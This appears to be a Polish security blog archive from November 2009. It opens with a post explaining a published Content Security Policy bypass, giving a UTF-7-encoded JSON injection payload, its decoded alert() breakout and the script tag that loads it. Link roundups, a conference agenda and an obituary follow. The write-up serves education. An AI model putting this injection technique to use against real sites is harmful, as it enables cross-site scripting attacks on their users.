Gareth Heyes opublikował właśnie na swoim blogu, informację dotyczącą sposobu ominięcia zabezpieczeń w #CSP http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/
Na czym polega błąd?
Każda strona z feedem JSON'a nad którym może mieć kontrolę atakujący, może zostać zarażona własnym ciągiem JSON'a, dzięki czemu można kontrolować pozostałe elementy feed'a.
Wyjaśnijmy to na przykładzie. W UTF-7 ABC pojawia się jako:
+ACcAQQBCAEMAJw-
jeżeli przykładowa odpowiedź w JSON wygląda tak:
[{'friend':'something',email:'something'} ]
mając kontrolę nad wartością: something, możemy umieścić własny kod:
+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-
(w UTF-8: '}];alert('May the force be with you');[{'job':'done )
Umieszczając w/w kod, powstaje nam:
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJw
BNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdw
BpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAb
wBiACcAOgAnAGQAbwBuAGU-'}]
czyli:
[{'friend':'luke','email':''}];alert(’May the force be with you’);[{'job':'done'}]
Wstrzykując takie dane, poprzez odwołanie się do skryptu (ustawiając kodowanie na UTF-7):
"><script src="http://some.website/test.json" charset="utf-7"></script>
uruchamiamy kod pod CSP, omijając zabezpieczenia.
Przykładowe działające demo: http://www.businessinfo.co.uk/labs/cspluke/test.html
Więcej informacji na temat CSP: http://blog.mozilla.com/security/2009/09/30/a-glimpse-into-the-future-of-browser-security/
Testy CSP: http://people.mozilla.org/~bsterne/content-security-policy/demo.cgi
Zapraszam do testów :)
23 lis 2009
18 lis 2009
Każdy lubi puknąć
Przeglądając lifehack'i, trafiłem na dosyć ciekawe zastosowanie pukania jako klucza do drzwi.
Muszę przyznać, że pomysł jest naprawdę oryginalny, ale ma wiele wad i raczej nie znajdzie zastosowania jako zabezpieczenie drzwi wejsciowych od domu.
http://www.engadget.com/2009/11/04/secret-knock-door-lock-defends-home-from-rhythmically-impaired/
Muszę przyznać, że pomysł jest naprawdę oryginalny, ale ma wiele wad i raczej nie znajdzie zastosowania jako zabezpieczenie drzwi wejsciowych od domu.
http://www.engadget.com/2009/11/04/secret-knock-door-lock-defends-home-from-rhythmically-impaired/
Infiltracja w Polsce
No proszę, myślałem że już nic mnie w tym kraju nie zaskoczy, a tu takie numery...
http://osnews.pl/rzad-ujawnil-projekt-filtrowania-internetu-w-polsce/
http://osnews.pl/rzad-ujawnil-projekt-filtrowania-internetu-w-polsce/
CONFidence 2.0
To już jutro,
Agenda: http://200902.confidence.org.pl/agenda/
Zapowiada się naprawdę ciekawie :)
Jednak widzę, że ponownie będzie problem z wyborem niektórych wykładów, np:
Gareth Heyes XSS Lightsabre techniques using Hackvertor
oraz w tym samym czasie:
Frank Breedijk AutoNessus: analyzing vulnerability assessment data the easy way…
tak samo: Gynvael Coldwind Practical security in computer games
oraz:
Claudio Criscione The glass cage. Virtualization security
Zobaczymy jak to będzie...
Agenda: http://200902.confidence.org.pl/agenda/
Zapowiada się naprawdę ciekawie :)
Jednak widzę, że ponownie będzie problem z wyborem niektórych wykładów, np:
Gareth Heyes XSS Lightsabre techniques using Hackvertor
oraz w tym samym czasie:
Frank Breedijk AutoNessus: analyzing vulnerability assessment data the easy way…
tak samo: Gynvael Coldwind Practical security in computer games
oraz:
Claudio Criscione The glass cage. Virtualization security
Zobaczymy jak to będzie...
17 lis 2009
(in)security tygodnia
Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security:
http://www.examiner.com/x-14651-Minneapolis-Information-Technology-Examiner~y2009m11d11-Cenzic-wants-to-make-sure-your-Web-site-is-healthy?cid=email-this-article
#Cenzic wants to make sure your #Web site is #healthy
http://www.darknet.org.uk/2009/11/ssl-renegotiation-bug-succesfully-used-to-attack-twitter/
#SSL #Renegotiation #Bug Succesfully Used To #Attack #Twitter
http://www.heise-online.pl/security/news/item/Krytyka-raportu-o-lukach-859104.html
#Krytyka #raportu o lukach
http://pentestit.com/2009/11/13/simple-small-114-tools-perl-penetration-testing
#Simple small 114 #tools in perl for #enumeration and #penetration #testing
http://chuvakin.blogspot.com/2009/11/more-pci-devil-defense.html
More #PCI #Devil #Defense
http://www.net-security.org/secworld.php?id=8490
#Facebook groups #hacked through design #flaw
http://www.foregroundsecurity.com/MyBlog/flash-origin-policy-issues.html
#Flash #Origin #Policy #Issues
http://www.foreignaffairs.com/articles/65499/wesley-k-clark-and-peter-l-levin/securing-the-information-highway
#Securing the #Information Highway
http://ha.ckers.org/blog/20091116/session-fixation-via-dns-rebinding/
#Session #Fixation Via #DNS #Rebinding
http://niebezpiecznik.pl/post/nowe-archiwum-exploitow-kontynuacja-milw0rma/
Nowe Archiwum #Exploitów — kontynuacja milw0rma?
http://www.examiner.com/x-14651-Minneapolis-Information-Technology-Examiner~y2009m11d11-Cenzic-wants-to-make-sure-your-Web-site-is-healthy?cid=email-this-article
#Cenzic wants to make sure your #Web site is #healthy
http://www.darknet.org.uk/2009/11/ssl-renegotiation-bug-succesfully-used-to-attack-twitter/
#SSL #Renegotiation #Bug Succesfully Used To #Attack #Twitter
http://www.heise-online.pl/security/news/item/Krytyka-raportu-o-lukach-859104.html
#Krytyka #raportu o lukach
http://pentestit.com/2009/11/13/simple-small-114-tools-perl-penetration-testing
#Simple small 114 #tools in perl for #enumeration and #penetration #testing
http://chuvakin.blogspot.com/2009/11/more-pci-devil-defense.html
More #PCI #Devil #Defense
http://www.net-security.org/secworld.php?id=8490
#Facebook groups #hacked through design #flaw
http://www.foregroundsecurity.com/MyBlog/flash-origin-policy-issues.html
#Flash #Origin #Policy #Issues
http://www.foreignaffairs.com/articles/65499/wesley-k-clark-and-peter-l-levin/securing-the-information-highway
#Securing the #Information Highway
http://ha.ckers.org/blog/20091116/session-fixation-via-dns-rebinding/
#Session #Fixation Via #DNS #Rebinding
http://niebezpiecznik.pl/post/nowe-archiwum-exploitow-kontynuacja-milw0rma/
Nowe Archiwum #Exploitów — kontynuacja milw0rma?
10 lis 2009
(in)security tygodnia
Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek:
http://blog.securitystandard.pl/news/352111.html - Łamanie haseł w chmurze #pgp #lamanie #security #cloud
http://livelabs.com/web-sandbox/ - Web sandbox od microsoft #microsoft #web #security #sandbox
http://chuvakin.blogspot.com/2009/11/releasing-many-of-my-security-papers.html - Mega zbiór ciekawych dokumentów #ebook #security #thinksecure
http://blog.ivanristic.com/2009/11/ssl-and-tls-authentication-gap-vulnerability-discovered.html - SSL and TLS Authentication Gap vulnerability #ssl #vulnerability #tls #security
http://news.cnet.com/8301-1009_3-10390118-83.html - Corporate bank accounts targeted in online fraud #bank #fraud #security
http://devcentral.f5.com/weblogs/macvittie/archive/2009/11/06/when-is-more-important-than-where-in-web-application-security.aspx - VICTIMS DON’T CARE ABOUT WHERE, THEY CARE ABOUT BEING PROTECTED #security #web #websecurity
http://www.heise-online.pl/security/news/item/Facebook-i-MySpace-naprawiaja-flashowe-backdoory-852288.html - Dziury w facebook i MySpace #facebook #myspace #flash #security #crossdomain
http://blog.codeninja.pl/2009/11/threat-modeling-in-end.html - Threat Modeling in The End #threatmodeling #rezos #security
4 lis 2009
str0ke nie żyje, milw0rm
bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html
Many of us have wondered where str0ke has been and why #milw0rm has not been updated in a good while. I recently was informed that #str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.
Sadly....
I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at #9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.
We wish nothing but blessing to his wife and 4 children.
#RIP str0ke 1974-04-29 - 2009-11-03 09:23
:o(
2 lis 2009
(in)security tygodnia
Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek:
http://blog.itsecurityexpert.co.uk/2009/11/how-secure-is-your-uk-online-banking.html - odnośnie ostatniego wpisu
http://www.heise-online.pl/security/news/item/Hasla-wielowyrazowe-w-systemie-platnosci-Amazona-846478.html
http://www.securitum.pl/baza-wiedzy/publikacje/zdalny-root-na-routerze-soho
http://www.securitytube.net/Evolution-of-Security-(Fsecure)-video.aspx
http://www.theregister.co.uk/2009/10/27/mass_website_compromises_spike/
http://www.itproportal.com/www/news/article/2009/10/28/how-will-windows-7-affect-risk-management-business/
http://www.abw.gov.pl/portal/pl/8/381/Warszawa_28102009_r.html
http://bothunters.pl/2009/11/02/byl-facebook-jest-myspace-czekamy-na-hasla-na-naszej-klasie/?owa_from=feed&owa_sid=
http://www.microsoft.com/downloads/details.aspx?FamilyID=037f3771-330e-4457-a52c-5b085dc0a4cd&displaylang=en
http://prawo.vagla.pl/node/8722
Subskrybuj:
Posty (Atom)
Posty
